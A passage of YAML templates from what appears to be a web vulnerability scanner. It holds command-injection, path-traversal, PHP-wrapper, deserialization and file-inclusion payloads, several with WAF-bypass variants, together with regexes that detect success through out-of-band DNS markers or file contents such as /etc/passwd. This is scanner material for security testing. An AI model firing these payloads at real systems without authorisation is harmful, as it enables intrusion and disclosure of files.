41 | #- "`getent$IFS$9hosts$IFS$9DNS_MARKER`"
42 | #- "|getent hosts DNS_MARKER"
43 | #- "|getent$IFS$9hosts$IFS$9DNS_MARKER"
44 | #- "x\ngentent$IFS$9hosts$IFS$9DNS_MARKER\nx"
45 | #- "$(getent$IFS$9hosts$IFS$9DNS_MARKER)"
46 |
47 | #ping DNS_MARKER
48 | #- ";ping -c1 DNS_MARKER;"
49 | #- ";ping$IFS$9-c1$IFS$9DNS_MARKER;"
50 | #- "';ping -c1 DNS_MARKER;'"
51 | #- "';ping$IFS$9-c1$IFS$9DNS_MARKER;'"
52 | #- "\";ping -c1 DNS_MARKER;\""
53 | #- "\";ping$IFS$9-c1$IFS$9DNS_MARKER;\""
54 | #- "`ping -c1 DNS_MARKER`"
55 | #- "`ping$IFS$9-c1$IFS$9DNS_MARKER`"
56 | #- "|ping -c1 DNS_MARKER"
57 | #- "|ping$IFS$9-c1$IFS$9DNS_MARKER"
58 | #- "x\nping$IFS$9-c1$IFS$9DNS_MARKER\nx"
59 | #- "$(ping$IFS$9-c1$IFS$9DNS_MARKER)"
60 |
61 | - method:
62 | - postfix
63 | - replace
64 |
65 | detect:
66 | - oob:
67 | - dns
68 | - response:
69 | - body: CALC_MARKER
70 |
71 | meta-info:
72 | - type: rce
73 | - threat: 95
74 | - tags:
75 | - OS Commanding
76 | - RCE
77 | - Remote Code Execution
78 | - Shell injection
79 | - Command injection
80 | - OWASP Top 10
81 | - OWASP
82 |
--------------------------------------------------------------------------------
/command-injection-windows.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | #For QUICK scan profile. DNS_MARKER & CALC_MARKER.
4 | - "& nslookup DNS_MARKER &"
5 | - "'& nslookup DNS_MARKER'"
6 | - "\"& nslookup DNS_MARKER\""
7 | - "| nslookup DNS_MARKER"
8 | - "'| nslookup DNS_MARKER'"
9 | - "\"| nslookup DNS_MARKER\""
10 | - "& set /a CALC_MARKER &"
11 | - "'& set /a CALC_MARKER'"
12 | - "\"& set /a CALC_MARKER\""
13 | - "| set /a CALC_MARKER"
14 | - "'| set /a CALC_MARKER'"
15 | - "\"| set /a CALC_MARKER\""
16 |
17 | #For INTENSIVE scan profile. May be useful for the limited size of the parameter or WAF bypass.
18 | # DNS_MARKER
19 | # - "& nslookup DNS_MARKER &"
20 | # - "&%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER%PROGRAMFILES:~10,-5%&"
21 | # - "'& nslookup DNS_MARKER'"
22 | # - "'&%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER'"
23 | # - "\"& nslookup DNS_MARKER\""
24 | # - "\"&%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER\""
25 | # - "| nslookup DNS_MARKER"
26 | # - "|%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER"
27 | # - "'| nslookup DNS_MARKER'"
28 | # - "'|%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER'"
29 | # - "\"| nslookup DNS_MARKER\""
30 | # - "\"|%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER\""
31 | #CALC_MARKER
32 | # - "& set /a CALC_MARKER &"
33 | # - "&%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER%PROGRAMFILES:~10,-5%&"
34 | # - "'&set /a CALC_MARKER'"
35 | # - "'&%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER'"
36 | # - "\"& set /a CALC_MARKER\""
37 | # - "\"&%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER\""
38 | # - "| set /a CALC_MARKER"
39 | # - "|%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER"
40 | # - "'| set /a CALC_MARKER'"
41 | # - "'|%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER'"
42 | # - "\"| set /a CALC_MARKER\""
43 | # - "\"|%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER\""
44 |
45 | - method:
46 | - postfix
47 | - replace
48 |
49 | detect:
50 | - oob:
51 | - dns
52 | - response:
53 | - body: CALC_MARKER
54 |
55 | meta-info:
56 | - type: rce
57 | - threat: 95
58 | - tags:
59 | - OS Commanding
60 | - RCE
61 | - Remote Code Execution
62 | - Shell injection
63 | - Command injection
64 | - OWASP Top 10
65 | - OWASP
66 | - Windows command injection
67 |
--------------------------------------------------------------------------------
/crlf.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | generate:
5 | - payload:
6 | - "%0d%0ax-crlf-header: STR_MARKER"
7 | - "%0ax-crlf-header: STR_MARKER"
8 | - method:
9 | - postfix
10 | detect:
11 | - response:
12 | - headers:
13 | - 'x-crlf-header': 'STR_MARKER'
14 | meta-info:
15 | - type: info
16 | - threat: 30
17 | - tags:
18 | - CRLF
19 | - Injection
20 |
--------------------------------------------------------------------------------
/directory-listing.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | generate:
5 | - payload:
6 | - /etc
7 | - /dev
8 | - method:
9 | - replace
10 | detect:
11 | - response:
12 | - body: '(passwd).*(shadow-).*(localtime)'
13 | - body: '(core).*(stdout).*(null)'
14 | meta-info:
15 | - type: ptrav
16 | - threat: 80
17 | - tags:
18 | - Path Traversal
19 | - Misconfiguration
20 | - Directory Listing
21 | - Insecure Direct Object References
22 | - Broken Access Control
23 | - OWASP
24 | - OWASP Top-10
--------------------------------------------------------------------------------
/django_nginx_alias_traversal.yaml:
--------------------------------------------------------------------------------
1 | #Attention! You have to add URI_.* insertion point to your policy
2 | send:
3 | - method: 'GET'
4 | url: '/static../manage.py'
5 |
6 | - method: 'GET'
7 | url: '/media../manage.py'
8 |
9 | - method: 'GET'
10 | url: '/uploads../manage.py'
11 |
12 | - method: 'GET'
13 | url: '/static../__init__.py'
14 |
15 | - method: 'GET'
16 | url: '/media../__init__.py'
17 |
18 | - method: 'GET'
19 | url: '/uploads../__init__.py'
20 |
21 | - method: 'GET'
22 | url: '/static../settings.py'
23 |
24 | - method: 'GET'
25 | url: '/media../settings.py'
26 |
27 | - method: 'GET'
28 | url: '/uploads../settings.py'
29 |
30 | - method: 'GET'
31 | url: '/static../apps/settings.py'
32 |
33 | - method: 'GET'
34 | url: '/media../apps/settings.py'
35 |
36 | - method: 'GET'
37 | url: '/uploads../apps/settings.py'
38 |
39 | - method: 'GET'
40 | url: '/static../dev/settings.py'
41 |
42 | - method: 'GET'
43 | url: '/media../dev/settings.py'
44 |
45 | - method: 'GET'
46 | url: '/uploads../dev/settings.py'
47 |
48 | - method: 'GET'
49 | url: '/static../production/settings.py'
50 |
51 | - method: 'GET'
52 | url: '/media../production/settings.py'
53 |
54 | - method: 'GET'
55 | url: '/uploads../production/settings.py'
56 |
57 | - method: 'GET'
58 | url: '/static../project/settings.py'
59 |
60 | - method: 'GET'
61 | url: '/media../project/settings.py'
62 |
63 | - method: 'GET'
64 | url: '/uploads../project/settings.py'
65 |
66 | - method: 'GET'
67 | url: '/static../mysite/settings.py'
68 |
69 | - method: 'GET'
70 | url: '/media../mysite/settings.py'
71 |
72 | - method: 'GET'
73 | url: '/uploads../mysite/settings.py'
74 |
75 | - method: 'GET'
76 | url: '/static../website/settings.py'
77 |
78 | - method: 'GET'
79 | url: '/media../website/settings.py'
80 |
81 | - method: 'GET'
82 | url: '/uploads../website/settings.py'
83 |
84 | detect:
85 | - response:
86 | - body: 'from django\.core\.management import execute_from_command_line'
87 | - body: 'from django.* import'
88 | - body: '''django\.contrib\.staticfiles'','
89 |
90 | meta-info:
91 | - type: ptrav
92 | - threat: 70
93 | - applicable_for:
94 | - fast
95 | - scanner
96 | - tags:
97 | - Django
98 | - NGINX alias traversal
99 | - Misconfiguration
100 | - Path Traversal
101 |
--------------------------------------------------------------------------------
/expression-language-injection.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - '${CALC_MARKER}'
4 | method:
5 | - replace
6 |
7 | detect:
8 | - response:
9 | - body: CALC_MARKER
10 |
11 | meta-info:
12 | - threat: 60
13 | - type: xss
14 | - tags: # TODO: OWASP, CWE, WASC references
15 | - EL injection
16 | - Spring Framework
17 | - expression language injection
18 |
19 |
--------------------------------------------------------------------------------
/ffmpeg-uploads.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | match:
5 | - POST_MULTIPART_.*_FILE: '.*'
6 | generate:
7 | - payload:
8 | - !!str |
9 | #EXTM3U
10 | #EXT-X-MEDIA-SEQUENCE:0
11 | #EXTINF:10.0,
12 | file:///etc/passwd
13 | #EXT-X-ENDLIST
14 | - !!str |
15 | #EXTM3U
16 | #EXT-X-MEDIA-SEQUENCE:0
17 | #EXTINF:10.0,
18 | http://DNS_MARKER
19 | #EXT-X-ENDLIST
20 | - method:
21 | - replace
22 | - into: 'POST_MULTIPART_.*_FILE'
23 | detect:
24 | - response:
25 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
26 | - oob:
27 | - dns
28 | meta-info:
29 | - type: rce
30 | - threat: 95
31 | - tags:
32 | - OS Commanding
33 | - FFMPEG
34 | - Arbitraty File Reading
35 | - OWASP Top 10
36 | - OWASP
37 |
--------------------------------------------------------------------------------
/git-log-output.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | generate:
5 | - into: URI
6 | detect:
7 | - response:
8 | - body: 'commit\s[a-f0-9]{40}.*(\n+)Author\:.*\nDate\:'
9 | - body: 'commit[s]?.[a-f0-9]{40}'
10 | meta-info:
11 | - type: info
12 | - threat: 30
13 | - tags:
14 | - Information Exposure
15 |
--------------------------------------------------------------------------------
/git.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/.git/index'
4 |
5 | detect:
6 | - response:
7 | - body: ^DIRC
8 |
9 | meta-info:
10 | - type: info
11 | - threat: 30
12 | - applicable_for:
13 | - fast
14 | - tags:
15 | - GIT
16 | - Source Code Disclosure
17 | - Misconfiguration
18 | - Directory Listing
19 | - Insecure Direct Object References
20 | - Broken Access Control
21 | - OWASP
22 | - OWASP Top-10
23 | - A4:2010
24 | - A4:2013
25 | - A5:2017
--------------------------------------------------------------------------------
/graphql.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/graphql'
4 | headers:
5 | - Content-Type: application/json
6 | body: '{"query":"query {__schema{types {name}}}","variables":{},"operationName":null}'
7 |
8 | - method: 'POST'
9 | url: '/api/graphql'
10 | headers:
11 | - Content-Type: application/json
12 | body: '{"query":"query {__schema{types {name}}}","variables":{},"operationName":null}'
13 |
14 | - method: 'POST'
15 | url: '/graphql/'
16 | headers:
17 | - Content-Type: application/json
18 | body: '{"query":"query {__schema{types {name}}}","variables":{},"operationName":null}'
19 |
20 | - method: 'POST'
21 | url: '/-/graphql-explorer'
22 | headers:
23 | - Content-Type: application/json
24 | body: '{"query":"query {__schema{types {name}}}","variables":{},"operationName":null}'
25 |
26 | detect:
27 | - response:
28 | - body: '{"data":{"__schema"'
29 |
30 | meta-info:
31 | - title: "Disclosure of technical information at Graphql"
32 | - description: "Technical disclosure at GraphQL may cause information leakage. In case of improper configuration, a malicious user may get some critical information and use it for other attacks."
33 | - type: info
34 | - threat: 20
35 | - applicable_for:
36 | - fast
37 | - scanner
38 | - tags:
39 | - Graphql
40 | - Information Exposure
41 |
--------------------------------------------------------------------------------
/httpoxy.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ HEADER_HOST ] # only check for each single domain name because of environment nature of this bug
4 | generate:
5 | - payload:
6 | - "http://DNS_MARKER"
7 | - method:
8 | - replace
9 | - into: HEADER_HTTP_PROXY
10 | detect:
11 | - oob:
12 | - dns
13 | meta-info:
14 | - type: info
15 | - threat: 50
16 | - tags:
17 | - SSRF
18 | - Server Side Request Forgery
19 | - Link Injection
20 | - HTTPoxy # TODO: CVE reference
21 |
--------------------------------------------------------------------------------
/java-web-inf-parameter.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - "WEB-INF/web.xml"
4 | - "WEB-INF/./web.xml"
5 | - "WEB-INF/.../web.xml"
6 | - "WEB-INF/././web.xml"
7 | - "WEB-INF/../../WEB-INF/web.xml"
8 | - "WEB-INF/../../../WEB-INF/web.xml"
9 | - "WEB-INF/./xxx/../web.xml"
10 | - "WEB-INF/./xxx/yyy/../../web.xml"
11 | - "../WEB-INF/web.xml"
12 | - "../../../../WEB-INF/web.xml"
13 | - "../../WEB-INF/web.xml"
14 | - "../WEB-INF/web.xml;x="
15 | - "../../WEB-INF/web.xml;x="
16 | - "../../../WEB-INF/web.xml;x="
17 | - "%c0%ae/WEB-INF/web.xml"
18 | - "%c0%ae/%c0%ae/WEB-INF/web.xml"
19 | - "%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
20 |
21 | detect:
22 | - response:
23 | - body: '<web-app[\w\W]+<\/web-app>'
24 |
25 | meta-info:
26 | - title: "Java web.xml information leakage vulnerability"
27 | - description: "WEB-INF directory may be accessed by external users because of improper configuration, resulting in the leakage of configuration information."
28 | - type: info
29 | - threat: 20
30 | - tags:
31 | - Information Exposure
32 | - Java
33 | - web-inf
34 | - tomcat
35 | - JBoss
36 | - J2EE
37 |
--------------------------------------------------------------------------------
/java-web-inf-uri.yaml:
--------------------------------------------------------------------------------
1 | # you have to add URI_.* insertion point to your policy
2 | send:
3 | - method: 'GET'
4 | url: "/WEB-INF/web.xml"
5 |
6 | - method: 'GET'
7 | url: "/web-inf/web.xml"
8 |
9 | - method: 'GET'
10 | url: "/WEB-INF./web.xml"
11 |
12 | - method: 'GET'
13 | url: "/../WEB-INF/web.xml"
14 |
15 | - method: 'GET'
16 | url: "/../../WEB-INF/web.xml"
17 |
18 | - method: 'GET'
19 | url: "/../../../WEB-INF/web.xml"
20 |
21 | - method: 'GET'
22 | url: "/../../../../WEB-INF/web.xml"
23 |
24 | - method: 'GET'
25 | url: "/demo/../WEB-INF/web.xml"
26 |
27 | - method: 'GET'
28 | url: "/wiki/struts/..%252f..%252f/WEB-INF/web.xml"
29 |
30 | - method: 'GET'
31 | url: "/wiki/struts/..%252f..%252f..%252f/WEB-INF/web.xml"
32 |
33 | - method: 'GET'
34 | url: "/..;/WEB-INF/web.xml"
35 |
36 | - method: 'GET'
37 | url: "/..;/..;/WEB-INF/web.xml"
38 |
39 | - method: 'GET'
40 | url: "/..%3B/WEB-INF/web.xml"
41 |
42 | - method: 'GET'
43 | url: "/..%253B/WEB-INF/web.xml"
44 |
45 | - method: 'GET'
46 | url: "/plugins//../WEB-INF/web.xml%C0%80.jsp"
47 |
48 | - method: 'GET'
49 | url: "/js/app//../WEB-INF/web.xml%C0%80.jsp"
50 |
51 | - method: 'GET'
52 | url: "/js/app//../WEB-INF/web.xml"
53 |
54 | - method: 'GET'
55 | url: "/js/app//../../WEB-INF/web.xml"
56 |
57 | - method: 'GET'
58 | url: "/ctxroot/%C0%AE/WEB-INF/web.xml"
59 |
60 | - method: 'GET'
61 | url: "/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml"
62 |
63 | - method: 'GET'
64 | url: "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"
65 |
66 | - method: 'GET'
67 | url: "/js/app/../../WEB-INF/web.xml%3bx%3d/"
68 |
69 | - method: 'GET'
70 | url: "/js/app/1//../../WEB-INF/web.xml%C0%80.jsp"
71 |
72 | - method: 'GET'
73 | url: "/%c0%ae/WEB-INF/web.xml"
74 |
75 | - method: 'GET'
76 | url: "/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
77 |
78 | - method: 'GET'
79 | url: "/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
80 |
81 | - method: 'GET'
82 | url: "/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
83 |
84 | - method: 'GET'
85 | url: "/WEB-INF/web.xml;x="
86 |
87 | - method: 'GET'
88 | url: "/../WEB-INF/web.xml;x="
89 |
90 | - method: 'GET'
91 | url: "/../../WEB-INF/web.xml;x="
92 |
93 | - method: 'GET'
94 | url: "/../../../WEB-INF/web.xml;x="
95 |
96 | detect:
97 | - response:
98 | - body: '<web-app[\w\W]+<\/web-app>'
99 |
100 | meta-info:
101 | - title: "Java web.xml information leakage vulnerability"
102 | - description: "WEB-INF directory may be accessed by external users because of improper configuration, resulting in the leakage of configuration information."
103 | - type: info
104 | - threat: 20
105 | - applicable_for:
106 | - fast
107 | - scanner
108 | - tags:
109 | - Information Exposure
110 | - Java
111 | - web-inf
112 | - tomcat
113 | - JBoss
114 | - J2EE
115 |
--------------------------------------------------------------------------------
/jenkins-pre-auth.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: GET
3 | url: /securityRealm/user/admin/api/xml
4 |
5 | detect:
6 | - response:
7 | - body: "<user _class='hudson.model.User'>"
8 |
9 | meta-info:
10 | - type: info
11 | - threat: 43
12 | - applicable_for:
13 | - fast
14 | - scanner
15 | - tags:
16 | - Jenkins
17 | - Information Leak
18 | - CVE-2017-1000395
19 | - Pre-auth User Information Leakage
20 |
--------------------------------------------------------------------------------
/laravel-debugger.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/telescope'
4 |
5 | - method: 'GET'
6 | url: '/logs'
7 |
8 | - method: 'GET'
9 | url: '/debugbar.js'
10 |
11 | - method: 'GET'
12 | url: '/'
13 |
14 | detect:
15 | - response:
16 | - body: '<title>Telescope - Laravel<\/title>'
17 | - body: '<title>Laravel log viewer<\/title>'
18 | - body: 'PhpDebugBar\.DebugBar\(\);'
19 | - body: '(src="debugbar/debugbar\.js")|(src="debugbar\.js")'
20 |
21 | meta-info:
22 | - type: info
23 | - threat: 67
24 | - applicable_for:
25 | - fast
26 | - scanner
27 | - tags:
28 | - Laravel
29 | - PHP Debug Bar
30 | - Infoleak
31 |
--------------------------------------------------------------------------------
/memstats.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/debug/vars'
4 |
5 | detect:
6 | - response:
7 | - body: '"Alloc":\d+,"TotalAlloc":\d+,"Sys":\d+,"Lookups":\d+,"Mallocs":\d+,"Frees":\d+'
8 |
9 | meta-info:
10 | - title: "Disclosure of technical information at MemStats allocator statistics."
11 | - description: "The vulnerability is due to a lack of authorization when accessing the resource '/debug/vars'. As a result, the malicious user may obtain information of a technical nature and use it for other attacks."
12 | - type: info
13 | - threat: 20
14 | - applicable_for:
15 | - fast
16 | - scanner
17 | - tags:
18 | - Infoleak
19 | - Disclosure of technical information
--------------------------------------------------------------------------------
/nginx-server-status.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/nginx_status'
4 |
5 | - method: 'GET'
6 | url: '/nginx-status'
7 |
8 | detect:
9 | - response:
10 | - body: "Active connections"
11 | - body: "server accepts handled requests"
12 | meta-info:
13 | - type: info
14 | - threat: 20
15 | - applicable_for:
16 | - fast
17 | - tags:
18 | - Nginx server status
19 | - Disclosure of technical information
20 | - CWE-200 Information Exposure
--------------------------------------------------------------------------------
/nosqli.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - "'\"\\;{}"
4 |
5 | detect:
6 | - response:
7 | - body: "SyntaxError:.*literal not terminated before end of script"
8 | - body: "SyntaxError: Unexpected token"
9 | - body: "MongoError: SyntaxError: unterminated string literal"
10 |
11 | meta-info:
12 | - type: nosqli
13 | - threat: 60
14 | - tags:
15 | - OWASP Top 10
16 | - Application Errors
17 | - NoSQL injection
18 |
--------------------------------------------------------------------------------
/ntfs-alternative-streams.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | generate:
5 | - payload:
6 | - "::$DATA"
7 | - "::$INDEX_ALLOCATION"
8 | - ":$I30:$INDEX_ALLOCATION"
9 | - into:
10 | - ACTION_EXT
11 | - ACTION_NAME
12 | - PATH
13 | - method:
14 | - postfix
15 | detect:
16 | - response:
17 | - headers:
18 | - 'Content-Type': '.*binary.*'
19 | meta-info:
20 | - type: idor
21 | - threat: 60
22 | - tags:
23 | - Source Code Disclosure
24 | - Misconfiguration
25 | - Directory Listing
26 | - Insecure Direct Object References
27 | - Broken Access Control
28 | - OWASP
29 |
--------------------------------------------------------------------------------
/open-redirect.yaml:
--------------------------------------------------------------------------------
1 | #collect:
2 | # - uniq:
3 | # - [ URI ]
4 | generate:
5 | - payload:
6 | - "//DNS_MARKER"
7 | - "http://DNS_MARKER/"
8 | - method:
9 | - replace
10 | detect:
11 | - response:
12 | - body: "<META[^>]+content=[^>]+DNS_MARKER"
13 | - response:
14 | - body: "<a[^>]+href=[^>]+DNS_MARKER"
15 | - response:
16 | - headers:
17 | - 'Location': DNS_MARKER
18 | meta-info:
19 | - type: redir
20 | - threat: 30
21 | - tags:
22 | - Open Redirect
23 | - Unsafe Redirection # TODO: WASC and OWASP references
24 |
--------------------------------------------------------------------------------
/path-traversal-append.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | #LFI
4 | - ../../../../../../../../../etc/passwd
5 | - ../../../../../../../../../etc/passwd%00
6 | - ../../../../../../../../../etc/passwd\u0000
7 | - ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
8 | - ..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc/passwd
9 |
10 | - method:
11 | - postfix
12 |
13 | detect:
14 | - response:
15 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
16 |
17 | meta-info:
18 | - type: ptrav
19 | - threat: 80
20 | - tags:
21 | - Path Traversal
22 | - Arbitrary File Reading
23 | - Misconfiguration
24 | - Directory Listing
25 | - Insecure Direct Object References
26 | - Broken Access Control
27 | - OWASP
28 | - OWASP Top-10
29 | - A4:2010
30 | - A4:2013
31 | - A5:2017
32 | - JBOSS
33 | - Wildfly
34 | - CVE-2018-1047 # TODO: more CVE references, it's a common bug. Or we need to split between classic and custom vectors
35 |
--------------------------------------------------------------------------------
/path-traversal-replace.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - /etc/passwd
4 | - /%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd/
5 | - /../../../../../../../../../etc/passwd
6 | - /../../../../../../../../../etc/passwd%00
7 | - /../../../../../../../../../etc/passwd\u0000
8 | - "php://filter/convert.base64-encode/resource=../../../../../../../../../../etc/group"
9 | - "php://filter/convert.base64-encode/resource=../../../../../../../../../../etc/group\x00"
10 | - 'file:///etc/passwd'
11 | - 'file:///../../../../../../../../../etc/passwd'
12 | - 'file:///../../../../../../../../../etc/passwd\x00'
13 | - method:
14 | - replace
15 |
16 | detect:
17 | - response:
18 | - body: 'cm9vdDp4OjA6Cm' #part of base64 < /etc/group
19 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
20 |
21 | meta-info:
22 | - type: ptrav
23 | - threat: 80
24 | - tags:
25 | - Path Traversal
26 | - Arbitrary File Reading
27 | - Misconfiguration
28 | - Insecure Direct Object References
29 | - Broken Access Control
30 | - OWASP
31 | - OWASP Top-10
32 | - A4:2010
33 | - A4:2013
34 | - A5:2017
35 |
--------------------------------------------------------------------------------
/php-data.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - 'data:,<?php echo CALC_MARKER;'
4 | - 'data:,<?php file_get_contents(''http://DNS_MARKER'');'
5 | - method:
6 | - replace
7 | detect:
8 | - response:
9 | - body: CALC_MARKER
10 | - oob:
11 | - dns
12 | meta-info:
13 | - type: rce
14 | - threat: 80
15 | - tags:
16 | - php
17 |
--------------------------------------------------------------------------------
/php-rce.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - '+print(CALC_MARKER);'
4 | - "gethostbyname('DNS_MARKER');"
5 | - method:
6 | - replace
7 |
8 | detect:
9 | - oob:
10 | - dns
11 | - response:
12 | - body: CALC_MARKER
13 |
14 | meta-info:
15 | - type: rce
16 | - threat: 80
17 | - tags:
18 | - php
19 | - php command injection
20 |
--------------------------------------------------------------------------------
/php_wrappers.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | generate:
5 | - into: GET
6 | - payload:
7 | - 'expect://ping%20DNS_MARKER%20-c4'
8 | - 'data:text/plain,<?php%20system("cat%20/etc/passwd")?>%20OR%20data:text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKT8+'
9 | - 'ssh2.sftp://user:pass@DNS_MARKER:22/path/to/filename'
10 | - 'http://DNS_MARKER'
11 | - method:
12 | - replace
13 | detect:
14 | - oob:
15 | - dns
16 | - response:
17 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
18 | meta-info:
19 | - type: rce
20 | - threat: 90
21 | - tags:
22 | - RCE
23 | - php
24 | - php-wrappers
--------------------------------------------------------------------------------
/phpinfo.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/phpinfo'
4 |
5 | - method: 'GET'
6 | url: '/phpinfo.php'
7 |
8 | - method: 'GET'
9 | url: '/phpinfo.php5'
10 |
11 | - method: 'GET'
12 | url: '/phpinfo.php7'
13 |
14 | - method: 'GET'
15 | url: '/php.php'
16 |
17 | - method: 'GET'
18 | url: '/info.php'
19 |
20 | - method: 'GET'
21 | url: '/info.php5'
22 |
23 | - method: 'GET'
24 | url: '/info.php7'
25 |
26 | detect:
27 | - response:
28 | - body: '<title>phpinfo\(\)<\/title>'
29 |
30 | meta-info:
31 | - type: info
32 | - threat: 30
33 | - applicable_for:
34 | - fast
35 | - tags:
36 | - phpinfo
37 | - Information Exposure
--------------------------------------------------------------------------------
/public-docker-registry.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/v2/_catalog'
4 |
5 | detect:
6 | - response:
7 | - body: '\{"repositories":\[.*\]'
8 |
9 | meta-info:
10 | - type: info
11 | - threat: 60
12 | - applicable_for:
13 | - fast
14 | - tags:
15 | - Docker Registry
16 | - Misconfiguration
17 | - Broken Access Control
--------------------------------------------------------------------------------
/public-jolokia-jmx.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/jolokia/list'
4 |
5 | detect:
6 | - response:
7 | - body: 'java\.lang'
8 | - response:
9 | - body: 'java\.util'
10 |
11 | meta-info:
12 | - type: info
13 | - threat: 60
14 | - applicable_for:
15 | - fast
16 | - tags:
17 | - Misconfiguration
18 | - Directory Listing
19 | - Insecure Direct Object References
20 | - Broken Access Control
--------------------------------------------------------------------------------
/pyyaml-deserialization.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - into: "POST_MULTIPART_.*_FILE_value"
3 | - payload:
4 | - "!!python/object/new:eval [CALC_MARKER]"
5 | - "!!python/object/new:exec [import socket; socket.gethostbyname('DNS_MARKER')]"
6 | - method:
7 | - replace
8 |
9 | detect:
10 | - oob:
11 | - dns
12 | - response:
13 | - body: CALC_MARKER
14 |
15 | meta-info:
16 | - type: rce
17 | - threat: 90
18 | - tags:
19 | - pyYAML
20 | - python-deserialization
21 | - CVE-2017-18342
22 | - CVE-2019-20477
23 |
--------------------------------------------------------------------------------
/rce-dotnet-jackson.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | generate:
5 | - payload:
6 | - '{ "$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start","MethodParameters":{"$type":"System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","$values":["cmd","/cping DNS_MARKER"]},"ObjectInstance":{"$type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}}'
7 | - method:
8 | - replace
9 | detect:
10 | - oob:
11 | - dns
12 | meta-info:
13 | - threat: 95
14 | - type: rce # TODO: tags with CVE, OWASP and WASC references
15 |
--------------------------------------------------------------------------------
/remote-file-inclusion.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - 'http://wallarm.tools/rfi'
4 | - 'http://wallarm.tools/rfi.php'
5 | - 'http://wallarm.tools/rfi_location.php'
6 | - 'http://wallarm.tools/rfi-html'
7 | - 'http://wallarm.tools/rfi-html.html'
8 | - method:
9 | - replace
10 |
11 | detect:
12 | - response:
13 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
14 | - body: '# campus 284.122.107'
15 | - body: 'WLRM-RFI-TEST'
16 | - body: '<h1>WLRM-TEST-HTML-INCLUDE-777</h1>'
17 |
18 | meta-info:
19 | - type: ptrav
